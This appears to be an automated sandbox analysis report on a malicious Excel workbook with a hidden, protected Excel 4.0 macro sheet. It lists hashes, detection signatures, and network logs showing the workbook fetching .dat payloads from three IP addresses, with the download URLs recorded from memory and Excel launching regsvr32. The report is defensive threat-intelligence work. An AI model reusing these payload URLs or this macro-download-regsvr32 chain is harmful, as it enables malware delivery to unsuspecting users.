Windows Analysis Report ClaimCopy-1848214335-12022021.xlsb

Overview

General Information

Sample Name: ClaimCopy-1848214335-12022021.xlsb
Analysis ID: 532757
MD5: 08dbf91f6a89fdb8dcd18dfe657147f3
SHA1: 990b5abe4b156c201174e412aca4b3dcb372070c
SHA256: 29db2ea5fcb6ab8fca34ee80ae3a9c2ebda224ee631d754208ec53bc2b610267
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected potential crypto function
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: ClaimCopy-1848214335-12022021.xlsb Virustotal: Detection: 8% Perma Link
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49746 -> 185.82.126.78:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49746 -> 185.82.126.78:80

Networking:

barindex
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:13 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:13 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://158.69.133.78/337591964609.dat
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://158.69.133.78/337591964609.dat24
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://158.69.133.78/337591964609.dat2e
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://158.69.133.78/337591964609.datQ
Source: EXCEL.EXE, 00000000.00000003.413539859.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413742220.0000000012F33000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/337591964609.dat
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/337591964609.dat2
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/337591964609.dath
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/337591964609.dat
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/337591964609.dat2
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/337591964609.dat2?
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/337591964609.datG
